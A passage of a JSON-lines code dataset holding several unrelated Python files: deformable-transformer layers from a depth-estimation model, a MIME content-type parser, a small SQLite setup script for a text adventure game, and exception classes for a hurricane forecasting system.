\n query_mask = torch.zeros_like(query_feat[:, 0, :, :]).type(torch.bool)\n query_embed = self.query_pos_embed(query_feat, query_mask).flatten(2).transpose(1, 2)\n query_feat = query_feat.flatten(2).transpose(1, 2)\n \n hs, refs, memory = self.transformer(srcs, masks, poses, query_embed=query_embed, query_feat=query_feat)\n # start_point = 0\n # for i in range(len(outs) - 1):\n # bs, c, h, w = outs[i].shape\n # end_point = start_point + h * w\n # map = memory[:, start_point:end_point, :].permute(0, 2, 1).reshape(bs, self.embedding_dim, h, w)\n # feat = torch.cat([outs[i], map], dim=1)\n # outs[i] = feat\n # start_point = end_point\n\n map = hs[-1].permute(0, 2, 1).reshape(_bs, self.embedding_dim, _h, _w)\n feat = torch.cat([outs[-1], map], dim=1)\n outs[-1] = feat\n\n return tuple(outs)\n\n\n\n# position embedding for fusion layer\nclass PositionEmbeddingSine(nn.Module):\n \"\"\"\n This is a more standard version of the position embedding, very similar to the one\n used by the Attention is all you need paper, generalized to work on images.\n \"\"\"\n def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):\n super().__init__()\n self.num_pos_feats = num_pos_feats\n self.temperature = temperature\n self.normalize = normalize\n if scale is not None and normalize is False:\n raise ValueError(\"normalize should be True if scale is passed\")\n if scale is None:\n scale = 2 * math.pi\n self.scale = scale\n\n def forward(self, x, mask):\n assert mask is not None\n not_mask = ~mask\n y_embed = not_mask.cumsum(1, dtype=torch.float32)\n x_embed = not_mask.cumsum(2, dtype=torch.float32)\n if self.normalize:\n eps = 1e-6\n y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale\n x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale\n\n dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device)\n dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats)\n\n pos_x = x_embed[:, :, :, None] / dim_t\n pos_y = y_embed[:, :, :, None] / dim_t\n pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, 
:, :, 1::2].cos()), dim=4).flatten(3)\n pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)\n pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)\n return pos\n\nclass PositionEmbeddingLearned(nn.Module):\n \"\"\"\n Absolute pos embedding, learned.\n \"\"\"\n def __init__(self, num_pos_feats=256):\n super().__init__()\n self.row_embed = nn.Embedding(50, num_pos_feats)\n self.col_embed = nn.Embedding(50, num_pos_feats)\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.uniform_(self.row_embed.weight)\n nn.init.uniform_(self.col_embed.weight)\n\n def forward(self, x, mask):\n h, w = x.shape[-2:]\n i = torch.arange(w, device=x.device)\n j = torch.arange(h, device=x.device)\n x_emb = self.col_embed(i)\n y_emb = self.row_embed(j)\n pos = torch.cat([\n x_emb.unsqueeze(0).repeat(h, 1, 1),\n y_emb.unsqueeze(1).repeat(1, w, 1),\n ], dim=-1).permute(2, 0, 1).unsqueeze(0).repeat(x.shape[0], 1, 1, 1)\n return pos\n\nclass DeformableTransformer(nn.Module):\n def __init__(self, d_model=256, nhead=8,\n num_encoder_layers=6, num_decoder_layers=6, dim_feedforward=1024, dropout=0.1,\n activation=\"relu\", return_intermediate_dec=False,\n num_feature_levels=4, dec_n_points=4, enc_n_points=4):\n super().__init__()\n\n self.d_model = d_model\n self.nhead = nhead\n\n encoder_layer = DeformableTransformerEncoderLayer(d_model, dim_feedforward,\n dropout, activation,\n num_feature_levels, nhead, enc_n_points)\n self.encoder = DeformableTransformerEncoder(encoder_layer, num_encoder_layers)\n\n decoder_layer = DeformableTransformerDecoderLayer(d_model, dim_feedforward,\n dropout, activation,\n num_feature_levels, nhead, dec_n_points)\n self.decoder = DeformableTransformerDecoder(decoder_layer, num_decoder_layers, return_intermediate_dec)\n\n self.level_embed = nn.Parameter(torch.Tensor(num_feature_levels, d_model))\n\n self.reference_points = nn.Linear(d_model, 2)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n for m in self.modules():\n if isinstance(m, MSDeformAttn):\n m._reset_parameters()\n xavier_uniform_(self.reference_points.weight.data, gain=1.0)\n constant_(self.reference_points.bias.data, 0.)\n normal_(self.level_embed)\n\n def get_valid_ratio(self, mask):\n _, H, W = mask.shape\n valid_H = torch.sum(~mask[:, :, 0], 1)\n valid_W = torch.sum(~mask[:, 0, :], 1)\n valid_ratio_h = valid_H.float() / H\n valid_ratio_w = valid_W.float() / W\n valid_ratio = torch.stack([valid_ratio_w, valid_ratio_h], -1)\n return valid_ratio\n\n def forward(self, srcs, masks, pos_embeds, query_embed=None, query_feat=None):\n\n # prepare input for encoder\n src_flatten = []\n mask_flatten = []\n lvl_pos_embed_flatten = []\n spatial_shapes = []\n for lvl, (src, mask, pos_embed) in enumerate(zip(srcs, masks, pos_embeds)):\n bs, c, h, w = src.shape\n spatial_shape = (h, w)\n spatial_shapes.append(spatial_shape)\n src = src.flatten(2).transpose(1, 2)\n mask = mask.flatten(1)\n pos_embed = pos_embed.flatten(2).transpose(1, 2)\n lvl_pos_embed = pos_embed + self.level_embed[lvl].view(1, 1, -1)\n lvl_pos_embed_flatten.append(lvl_pos_embed)\n src_flatten.append(src)\n mask_flatten.append(mask)\n src_flatten = torch.cat(src_flatten, 1)\n mask_flatten = torch.cat(mask_flatten, 1)\n lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, 1)\n spatial_shapes = torch.as_tensor(spatial_shapes, dtype=torch.long, device=src_flatten.device)\n level_start_index = 
torch.cat((spatial_shapes.new_zeros((1, )), spatial_shapes.prod(1).cumsum(0)[:-1]))\n valid_ratios = torch.stack([self.get_valid_ratio(m) for m in masks], 1)\n\n # encoder\n memory = self.encoder(src_flatten, spatial_shapes, level_start_index, valid_ratios, lvl_pos_embed_flatten, mask_flatten)\n\n # prepare input for decoder\n bs, _, c = memory.shape\n tgt = query_feat \n query_embed = query_embed\n reference_points = self.reference_points(query_embed).sigmoid()\n\n # decoder\n hs, inter_references = self.decoder(tgt, reference_points, memory,\n spatial_shapes, level_start_index, valid_ratios, query_embed, mask_flatten)\n\n return hs, inter_references, memory\n\nclass DeformableTransformerEncoderLayer(nn.Module):\n def __init__(self,\n d_model=256, d_ffn=1024,\n dropout=0.1, activation=\"relu\",\n n_levels=4, n_heads=8, n_points=4):\n super().__init__()\n\n # self attention\n self.self_attn = MSDeformAttn(d_model, n_levels, n_heads, n_points)\n self.dropout1 = nn.Dropout(dropout)\n self.norm1 = nn.LayerNorm(d_model)\n\n # ffn\n self.linear1 = nn.Linear(d_model, d_ffn)\n self.activation = _get_activation_fn(activation)\n self.dropout2 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(d_ffn, d_model)\n self.dropout3 = nn.Dropout(dropout)\n self.norm2 = nn.LayerNorm(d_model)\n\n @staticmethod\n def with_pos_embed(tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward_ffn(self, src):\n src2 = self.linear2(self.dropout2(self.activation(self.linear1(src))))\n src = src + self.dropout3(src2)\n src = self.norm2(src)\n return src\n\n def forward(self, src, pos, reference_points, spatial_shapes, level_start_index, padding_mask=None):\n # self attention\n src2 = self.self_attn(self.with_pos_embed(src, pos), reference_points, src, spatial_shapes, level_start_index, padding_mask)\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n\n # ffn\n src = self.forward_ffn(src)\n\n return src\n\n\nclass DeformableTransformerEncoder(nn.Module):\n def __init__(self, encoder_layer, num_layers):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n\n @staticmethod\n def get_reference_points(spatial_shapes, valid_ratios, device):\n reference_points_list = []\n for lvl, (H_, W_) in enumerate(spatial_shapes):\n\n ref_y, ref_x = torch.meshgrid(torch.linspace(0.5, H_ - 0.5, H_, dtype=torch.float32, device=device),\n torch.linspace(0.5, W_ - 0.5, W_, dtype=torch.float32, device=device))\n ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, lvl, 1] * H_)\n ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, lvl, 0] * W_)\n ref = torch.stack((ref_x, ref_y), -1)\n reference_points_list.append(ref)\n reference_points = torch.cat(reference_points_list, 1)\n reference_points = reference_points[:, :, None] * valid_ratios[:, None]\n return reference_points\n\n def forward(self, src, spatial_shapes, level_start_index, valid_ratios, pos=None, padding_mask=None):\n output = src\n reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=src.device)\n for _, layer in enumerate(self.layers):\n output = layer(output, pos, reference_points, spatial_shapes, level_start_index, padding_mask)\n\n return output\n\n\nclass DeformableTransformerDecoderLayer(nn.Module):\n def __init__(self, d_model=256, d_ffn=1024,\n dropout=0.1, activation=\"relu\",\n n_levels=4, n_heads=8, n_points=4):\n super().__init__()\n\n # cross attention\n self.cross_attn = MSDeformAttn(d_model, n_levels, n_heads, n_points)\n self.dropout1 = 
nn.Dropout(dropout)\n self.norm1 = nn.LayerNorm(d_model)\n\n # self attention\n self.self_attn = nn.MultiheadAttention(d_model, n_heads, dropout=dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.norm2 = nn.LayerNorm(d_model)\n\n # ffn\n self.linear1 = nn.Linear(d_model, d_ffn)\n self.activation = _get_activation_fn(activation)\n self.dropout3 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(d_ffn, d_model)\n self.dropout4 = nn.Dropout(dropout)\n self.norm3 = nn.LayerNorm(d_model)\n\n @staticmethod\n def with_pos_embed(tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward_ffn(self, tgt):\n tgt2 = self.linear2(self.dropout3(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout4(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward(self, tgt, query_pos, reference_points, src, src_spatial_shapes, level_start_index, src_padding_mask=None):\n # self attention\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2 = self.self_attn(q.transpose(0, 1), k.transpose(0, 1), tgt.transpose(0, 1))[0].transpose(0, 1)\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n\n # cross attention\n tgt2 = self.cross_attn(self.with_pos_embed(tgt, query_pos),\n reference_points,\n src, src_spatial_shapes, level_start_index, src_padding_mask)\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n # ffn\n tgt = self.forward_ffn(tgt)\n\n return tgt\n\n\nclass DeformableTransformerDecoder(nn.Module):\n def __init__(self, decoder_layer, num_layers, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, reference_points, src, src_spatial_shapes, src_level_start_index, src_valid_ratios,\n query_pos=None, src_padding_mask=None):\n output = tgt\n\n intermediate = []\n intermediate_reference_points = []\n for lid, layer in enumerate(self.layers):\n if reference_points.shape[-1] == 4:\n reference_points_input = reference_points[:, :, None] \\\n * torch.cat([src_valid_ratios, src_valid_ratios], -1)[:, None]\n else:\n assert reference_points.shape[-1] == 2\n reference_points_input = reference_points[:, :, None] * src_valid_ratios[:, None]\n output = layer(output, query_pos, reference_points_input, src, src_spatial_shapes, src_level_start_index, src_padding_mask)\n\n if self.return_intermediate:\n intermediate.append(output)\n intermediate_reference_points.append(reference_points)\n\n if self.return_intermediate:\n return torch.stack(intermediate), torch.stack(intermediate_reference_points)\n\n return output, reference_points\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")","repo_name":"zhyever/DepthFormer","sub_path":"mmdepth/models/necks/multi_level_aff_neck.py","file_name":"multi_level_aff_neck.py","file_ext":"py","file_size_in_byte":22057,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27693037191","text":"from typing import NamedTuple, Optional, Dict\nfrom enum import Enum\nimport re\n\nfrom ..core.utils import parse_params\n\n# https://tools.ietf.org/html/rfc2045#section-5.1\n# 
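defines the base type/subtype grammar; its use in the HTTP Content-Type header is specified by\n# 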
https://tools.ietf.org/html/rfc7231#section-3.1.1.1\n\n\nclass MediaTypes(str, Enum):\n application = 'application'\n audio = 'audio'\n chemical = 'chemical'\n example = 'example'\n font = 'font'\n image = 'image'\n message = 'message'\n model = 'model'\n multipart = 'multipart'\n text = 'text'\n video = 'video'\n\n\n# rfc3025, rfc6839\nclass MediaSuffixes(str, Enum):\n ber = 'ber'\n cbor = 'cbor'\n cbor_seq = 'cbor-seq'\n der = 'der'\n fastinfoset = 'fastinfoset'\n gzip = 'gzip'\n json = 'json'\n json_seq = 'json-seq'\n jwt = 'jwt'\n sqlite3 = 'sqlite3'\n tlv = 'tlv' # https://en.wikipedia.org/wiki/Type-length-value\n xml = 'xml'\n wbxml = 'wbxml'\n zip = 'zip'\n\n\ndef mime_pattern(type: Optional[str] = None) -> str:\n TOKEN = r'[A-Z0-9-.]+'\n\n if not type:\n types = '|'.join(m.value for m in MediaTypes)\n type = f'{types}|x-{TOKEN}'\n suffixes = '|'.join(m.value for m in MediaSuffixes)\n pattern = (f'(?P{type})/'\n f'(?P{TOKEN})'\n fr'(\\+(?P{suffixes}))?')\n return f'(?i:{pattern})'\n\n\ndef content_type_pattern(type: Optional[str] = None) -> str:\n OWS = r'[ \\t]*'\n TOKEN = r'[A-Z0-9!#$%&\\'*+.^_`|~-]+'\n QUOTED = r'\\\"(?:[^\\\"\\\\\\\\]|\\\\.)*\\\"'\n PARAM = f';{OWS}{TOKEN}=({TOKEN}|{QUOTED})'\n\n return f'{mime_pattern(type)}(?P({PARAM})*)'\n\n\nMIME = re.compile(mime_pattern())\n\nCTYPE = re.compile(content_type_pattern(), re.I)\n\n\nclass MediaType(NamedTuple):\n type: str\n subtype: str\n suffix: Optional[str]\n\n def __str__(self) -> str:\n suffix = f'+{self.suffix}' if self.suffix else ''\n return f'{self.type}/{self.subtype}{suffix}'\n\n @classmethod\n def from_str(cls, string: str) -> 'MediaType':\n try:\n return cls(**MIME.match(string).groupdict())\n except AttributeError:\n raise ValueError(string)\n\n\nclass ContentType(NamedTuple):\n type: str\n subtype: str\n suffix: Optional[str]\n params: Optional[Dict[str, str]]\n\n def __str__(self) -> str:\n suffix = f'+{self.suffix}' if self.suffix else ''\n m_type = f'{self.type}/{self.subtype}{suffix}'\n params = [f'{k}={v}' for k, v in (self.params or {}).items()]\n return ';'.join((m_type, *params))\n\n @property\n def media_type(self) -> MediaType:\n return MediaType(type=self.type, subtype=self.subtype, suffix=self.suffix)\n\n @classmethod\n def from_str(cls, string: str) -> 'ContentType':\n try:\n ctype = CTYPE.match(string).groupdict()\n except AttributeError:\n raise ValueError(string)\n\n return cls(type=ctype['type'].lower(),\n subtype=ctype['subtype'].lower(),\n suffix=ctype['suffix'].lower() if ctype['suffix'] else None,\n params=parse_params(ctype['params']))\n","repo_name":"nuno-andre/pydentic","sub_path":"src/pydentic/strings/mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73476498668","text":"import sqlite3\nfrom db import Database\nfrom src.room import Room\n\ndb = Database(\"game.db\")\ndb.create_roomDB()\ndb.create_userDB()\n\n# uui, name, description, exits, characters\n\natrium = Room(\"atrium\", \"Atrium\", \"\"\"A two story tall atrium with grand windows, \\\n a central fountain and an excess of green leafy plants.\"\"\")\nmainhall = Room(\"mainhall\", \"Main Hall\", \"\"\"A large, extravagant entry hall.\\\n The walls are mirrored and at the far end is a large sliding glass door.\"\"\")\n\natrium.addNeighbor(mainhall, \"south\")\n\nmainhall.addNeighbor(atrium, \"north\")\n\n\nprint(\"loading rooms\")\n\ntry:\n db.load_room(mainhall)\n db.load_room(atrium)\nexcept 
sqlite3.IntegrityError as e:\n print(\"Room's already loaded\")\n\nprint(\"rooms loaded\")\n\ndb.commit()\n\ndb.retrieve_room((\"atrium\"))\n\n","repo_name":"ekapla04/mud","sub_path":"sqlpractice.py","file_name":"sqlpractice.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38823334521","text":"#! /usr/bin/env python3\n\n\"\"\"!Exceptions raised by the hafs package\n\nThis module contains exceptions raised by the hafs package.\"\"\"\n\nclass HAFSError(Exception):\n \"\"\"!Base class of all exceptions in this module.\n\n This is the base class of exceptions raised by the HAFS module\n due to HAFS-specific failures. It is possible to get other\n exceptions from the StandardException hierarchy in certain failure\n cases. For example, trying to obtain the fifth of three domains\n may raise KeyError. Also, see pom.exceptions for exceptions that\n may be raised from the pom package. See the produtil package for\n exceptions that may come from lower levels.\"\"\"\n\n########################################################################\n# CONFIGURATION EXCEPTIONS\n\nclass DuplicateTaskName(HAFSError):\n \"\"\"!Raised when more than one task is registered with the same\n name in an HAFSConfig object.\"\"\"\n\nclass InvalidConfigOptName(HAFSError):\n \"\"\"!Raised when one tries to use an invalid string for an option\n name.\"\"\"\n\n########################################################################\n# FAILURE TESTING\n\nclass FailureTestException(HAFSError):\n \"\"\"!Raised to simulate a failure condition in the HAFS system.\"\"\"\n\nclass ExpectedFailureTest(FailureTestException):\n \"\"\"!Raised to simulate a failure condition in the HAFS system that\n should be caught, and trigger automated fallbacks.\"\"\"\n\nclass UnexpectedFailureTest(FailureTestException):\n \"\"\"!Raised to simulate a failure condition in the HAFS system that\n should never happen, and should result in an immediate abort of\n the workflow, even if automated fallbacks are enabled. 
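It marks a condition that no fallback is designed to recover from. 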
\"\"\"\n\n########################################################################\n# ARCHIVING EXCEPTIONS\n\n\n########################################################################\n# NAMELIST-RELATED EXCEPTIONS\n\nclass NamelistValueError(ValueError):\n \"\"\"!Raised when hafs.namelist cannot convert a value to or from\n Fortran namelist format.\"\"\"\nclass NamelistKeyError(KeyError):\n \"\"\"!Raised when an hafs.namelist is asked for a key that does not\n exist.\"\"\"\n ##@var section\n # the section that was searched\n\n ##@var var\n # the option that was requested\n\n ##@var message\n # the exception message\n\n def __init__(self,message,section,var):\n \"\"\"!Constructor.\n @param message the string message\n @param section the section that was searched\n @param var the option that was requested\"\"\"\n super(NamelistKeyError,self).__init__(message)\n self.section=section\n self.var=var\n self.message=message\n def __str__(self):\n \"\"\"!Generates a string description of this exception.\"\"\"\n if self.section=='-trait-':\n return 'trait %s: %s' % (self.var,self.message)\n else:\n return '&%s %s: %s' % (self.section,self.var,self.message)\n def __repr__(self):\n \"\"\"!Generates a string representation of this object.\"\"\"\n return 'NamelistError(%s,%s,%s)' % \\\n ( repr(self.message), repr(self.section), repr(self.var) )\n\n########################################################################\n# SANITY CHECKER EXCEPTIONS\n\nclass HAFSSanityError(HAFSError):\n \"\"\"!Base class of all sanity checker exceptions.\"\"\"\nclass HAFSDirInsane(HAFSSanityError):\n \"\"\"!Raised when a directory is unspecified, missing or invalid.\"\"\"\n ##@var dir\n # The directory in question.\n\n def __init__(self,message,dir):\n \"\"\"!HAFSDirInsane constructor.\n @param message a string explanation of the problem\n @param dir the directory in question\"\"\"\n super(HAFSDirInsane,self).__init__(message)\n self.dir=dir\nclass HAFSConfigInsane(HAFSSanityError):\n \"\"\"!Raised when the requested configuration conf or hafs_expt files\n fail a sanity check.\"\"\"\nclass HAFSConfigUnsupported(HAFSConfigInsane):\n \"\"\"!Raised when the user requests a configuration that makes sense,\n but is not supported.\"\"\"\nclass HAFSConfigFileOrder(HAFSConfigInsane):\n \"\"\"!Raised when configuration files were specified in the wrong order.\"\"\"\nclass HAFSStormInsane(HAFSSanityError):\n \"\"\"!Raised when the configuration had a different storm than expected.\"\"\"\nclass HAFSCycleInsane(HAFSSanityError):\n \"\"\"!Raised when the configuration had a different cycle than expected.\"\"\"\nclass HAFSVariableInsane(HAFSSanityError):\n \"\"\"!Raised when a sanity check on a variable's value failed.\"\"\"\nclass HAFSInputInsane(HAFSSanityError):\n \"\"\"!Raised when input files to HAFS fail a sanity check.\"\"\"\nclass HAFSScriptInsane(HAFSSanityError):\n \"\"\"!Raised when HAFS scripts fail a sanity check.\"\"\"\nclass HAFSExecutableInsane(HAFSSanityError):\n \"\"\"!Raised when the HAFS executables fail a sanity check.\"\"\"\nclass HAFSFixInsane(HAFSSanityError):\n \"\"\"!Raised when the HAFS fix files fail a sanity check.\"\"\"\nclass HAFSArchiveInsane(HAFSSanityError):\n \"\"\"!Raised when the sanity check of the HAFS archiving settings\n fails.\"\"\"\nclass HAFSDataModelInsane(HAFSSanityError):\n \"\"\"!Raised when the sanity check of the HAFS data model settings\n fails.\"\"\"\n\n########################################################################\n# OCEAN AND WAVE EXCEPTIONS\n\n#NOTE: See 
pom.exceptions for more\nclass OceanInitFailed(HAFSError):\n \"\"\"!Raised when the ocean init did not produce some expected outputs.\"\"\"\nclass NoOceanData(HAFSError):\n \"\"\"!Raised when the parent global ocean model data was unavailable.\"\"\"\nclass OceanExeUnspecified(OceanInitFailed):\n \"\"\"!Raised when the HyCOM init forgets to choose an executable for\n the forecast job.\"\"\"\nclass InvalidOceanInitMethod(OceanInitFailed):\n \"\"\"!Raised when an invalid ocean initialization method is requested.\"\"\"\nclass OceanRestartMissing(OceanInitFailed):\n \"\"\"!Raised when the ocean restart file is missing.\"\"\"\nclass NoOceanBasin(OceanInitFailed):\n \"\"\"!Raised when there is no ocean basin for the selected domain center.\"\"\"\nclass OceanDataInvalid(OceanInitFailed):\n \"\"\"!Raised when an ocean input file contains invalid data.\"\"\"\n\nclass WaveInitFailed(HAFSError):\n \"\"\"!Raised when the wave initialization fails.\"\"\"\nclass WW3InputError(WaveInitFailed):\n \"\"\"!Raised when the wavewatch 3 cannot find necessary input.\"\"\"\n\n########################################################################\n# COUPLING EXCEPTIONS\n\nclass HAFSCouplingError(HAFSError):\n \"\"\"!Superclass of atmosphere-ocean-wave-otherthings coupling\n exceptions.\"\"\"\nclass NoCoupledComponents(HAFSCouplingError):\n \"\"\"!Raised when one requests a coupled forecast without specifying\n what is being coupled.\"\"\"\nclass EmptyCouplerNamelist(HAFSCouplingError):\n \"\"\"!Raised when the NCEP Coupler is to be used for coupling but its\n namelist file is empty or missing.\"\"\"\n\n########################################################################\n# GSI EXCEPTIONS\n\nclass GSIInputError(HAFSError):\n \"\"\"!Raised when GSI cannot find a required input file.\"\"\"\nclass ExpectedTDR(HAFSError):\n \"\"\"!Used in failure testing to abort the system if TDR was not present.\"\"\"\n\n########################################################################\n# TRACKER EXCEPTIONS\n\nclass TrackerError(HAFSError):\n \"\"\"!Base class of hafs.tracker exceptions.\"\"\"\nclass TrackerModeError(TrackerError):\n \"\"\"!Raised when an impossible tracker configuration is requested,\n such as running with a grid that is both regional and global.\"\"\"\nclass TrackerStormError(TrackerError):\n \"\"\"!Raised when multiple storms are requested, but only one was\n expected.\"\"\"\nclass TrackerInputError(TrackerError):\n \"\"\"!Base class of exceptions raised when the tracker's input files\n are missing or invalid.\"\"\"\nclass MissingGRIBError(TrackerInputError):\n \"\"\"!Not currently used, this would be raised when GRIB inputs to\n the tracker are missing.\"\"\"\nclass GRIBLocationError(TrackerInputError):\n \"\"\"!Raised when no location is specified for a tracker input GRIB\n file.\"\"\"\n\n########################################################################\n# TIME-RELATED EXCEPTIONS (used by many modules)\n\nclass HAFSTimeError(HAFSError):\n \"\"\"!Base class used for time-related HAFS exceptions.\"\"\"\n\n# Time and timestep exceptions:\nclass InvalidTimestep(HAFSTimeError):\n \"\"\"!Raised when a timestep is invalid, such as a negative timestep\n for a situation that requires a positive one.\"\"\"\nclass TimestepModularityError(HAFSTimeError):\n \"\"\"!Called when one hour is not divisible by the WRF output\n timestep.\"\"\"\nclass OverspecifiedOutputTime(HAFSTimeError):\n \"\"\"!Raised when an output time is specified in two redundant ways.\n\n For example, one could specify a forecast time 
directly, and also\n specify the analysis time and forecast time delta.\"\"\"\nclass NoOutputTime(HAFSTimeError):\n \"\"\"!Raised when a time was required, but none was provided.\"\"\"\nclass TimezoneProvided(HAFSTimeError):\n \"\"\"!Raised when a timezone is provided. The hafs package does not\n support timezones: all times are in UTC.\"\"\"\nclass PrecisionTooHigh(HAFSTimeError):\n \"\"\"!Raised when a time was requested with higher precision than available.\n\n Raised when a time was provided that contained fractions of a\n second, for a function that cannot handle that. For example, the\n WRF output files must be exactly on a second boundary.\"\"\"\nclass NotInTimespan(HAFSTimeError):\n \"\"\"!Raised when a time is outside the range of times being\n processed by a function.\"\"\"\nclass NoNearbyValues(HAFSTimeError):\n \"\"\"!Raised when an operation has a set of known times, but another\n provided time is not near one of those known times.\"\"\"\n\nclass InvalidTimespan(HAFSTimeError):\n \"\"\"!Superclass of exceptions relating to groups of one or more\n distinct times and relationships between them.\"\"\"\n ##@var start\n # the start of the problematic timespan\n\n ##@var end\n # the end of the problematic timespan\n\n def __init__(self,message,start,end):\n \"\"\"! Constructor for InvalidTimespan\n\n @param message the string explanation of the problem\n @param start the start of the timespan\n @param end the end of the timespan\"\"\"\n super(InvalidTimespan,self).__init__(message)\n self.start=start\n self.end=end\nclass EndBeforeStart(InvalidTimespan):\n \"\"\"!Raised when the end of a timespan is before the beginning.\"\"\"\nclass EndNotTimestep(InvalidTimespan):\n \"\"\"!Raised when the end of a timespan is not a timestep.\n Presently unused.\n\n Presently unused, this was to indicate that the end of a timespan\n is not on a timestep, for temporally discrete processes. 
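(For example, a process whose outputs exist only at whole timesteps.) 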
Such end\n times are allowed in WRF, so this exception is unused.\"\"\"\nclass StartNotAtParentTimestep(InvalidTimespan):\n \"\"\"!Raised when a timespan's beginning is not at a timestep.\"\"\"\nclass TimestepTooLong(InvalidTimespan):\n \"\"\"!Raised when a timestep is too long for the process under\n consideration.\"\"\"\nclass TimestepTooShort(InvalidTimespan):\n \"\"\"!Raised when a timestep is too short for the process under\n consideration.\"\"\"\nclass NoTimespan(InvalidTimespan):\n \"\"\"!Raised when a timespan was expected, but none was available.\"\"\"\n\n########################################################################\n# REGRIB-RELATED EXCEPTIONS (mostly hafs.regrib and hafs.gribtask)\n\nclass RegribError(HAFSError):\n \"\"\"!Superclass of errors used by Regrib.\"\"\"\nclass GRIBInputError(RegribError):\n \"\"\"!Raised when a GRIB file is invalid.\n\n Raised when a GRIB file is provided, but that file is invalid.\n This can be due to either an input to an operation, or the output\n from the operation.\"\"\"\nclass Subsetless(RegribError):\n \"\"\"!Raised when a Regrib was expecting a GRIB subsetter function,\n but no such function was provided.\"\"\"\n\nclass InvalidRegribResult(RegribError):\n \"\"\"!Debug assertion in hafs.regrib used to detect type mismatches.\n\n Part of debug assertions in hafs.regrib, this is raised when the\n wrong type is generated by the \"make\" function.\"\"\"\n\nclass RegribProductError(RegribError):\n \"\"\"!Superclass of errors relating to regrib products.\"\"\"\nclass NoProductError(RegribProductError):\n \"\"\"!Raised when an operation that produces input to Regrib should\n have produced a Product, but produced nothing at all.\"\"\"\nclass ProductAmbiguityError(RegribProductError):\n \"\"\"!Raised when an operation that provides input to Regrib produces\n more than one product.\"\"\"\nclass NoIndexError(RegribError):\n \"\"\"!Raised when a GRIB file should have an index file already, but\n doesn't.\"\"\"\n\nclass RegribManyError(RegribError):\n \"\"\"!Base class of errors from the hafs.regrib.RegribMany\"\"\"\nclass RegribKeyError(RegribManyError):\n \"\"\"!Raised when a RegribMany is given an invalid name: one that\n does not match a known grid or operation.\"\"\"\n\nclass RegribGridError(RegribError):\n \"\"\"!Base class of grid-related regrib errors.\"\"\"\nclass GridlessError(RegribGridError):\n \"\"\"!Raised when a grid was expected but none was provided.\"\"\"\nclass GridMismatchError(RegribGridError):\n \"\"\"!Raised when two GRIB files have non-matching grids, but a\n matching grid is required.\"\"\"\n\nclass GribberError(RegribError):\n \"\"\"!Exceptions for hafs.regrib.GRIBTask for certain internal errors.\n\n Raised by GRIBTask for unexpected errors that did not come from\n the underlying RegribAll object. 
This is used in GRIBTask.run's\n \"run it now\" mode, when setting raiseall=True.\"\"\"\n\n########################################################################\n# INPUT EXCEPTIONS\n\nclass HAFSInputError(HAFSError):\n \"\"\"!Base class of exceptions related to the hafs.input module.\"\"\"\nclass InputSourceBadType(HAFSInputError):\n \"\"\"!Raised when a configuration file requests a DataCatalog class\n that does not exist.\"\"\"\nclass InvalidInputSpecification(HAFSInputError):\n \"\"\"!Raised when an input source is missing the location, or both\n histprio and fcstprio.\"\"\"\nclass PartialTransfer(HAFSInputError):\n \"\"\"!Raised when a file transfer, done by an InputSource, was\n incomplete.\"\"\"\nclass UnsupportedTransfer(HAFSInputError):\n \"\"\"!Raised when a configuration file requests an unsupported data\n transfer method (such as carrier pigeon).\"\"\"\n\n########################################################################\n# Post exceptions\n\nclass PostFailed(HAFSError):\n \"\"\"!Raised upon errors that would cause a retry, in the\n PostOneWRF.run when passed the raiseall=True argument.\"\"\"\n\nclass PostHasNoInput(HAFSError):\n \"\"\"!Raised when the post's input file is not available and\n raiseall=True in PostOneWRF.run\"\"\"\n\n########################################################################\n# Relocation exceptions\n\nclass RelocationError(HAFSError):\n \"\"\"!Raised when something in the vortex relocation fails.\"\"\"\nclass RelocationInputError(RelocationError):\n \"\"\"!Raised when required inputs to the relocation are missing.\"\"\"\nclass RelocationConfigurationError(RelocationError):\n \"\"\"!Raised when an impossible configuration is requested.\"\"\"\nclass RelocateOutputMissing(RelocationError):\n \"\"\"!Raised when a 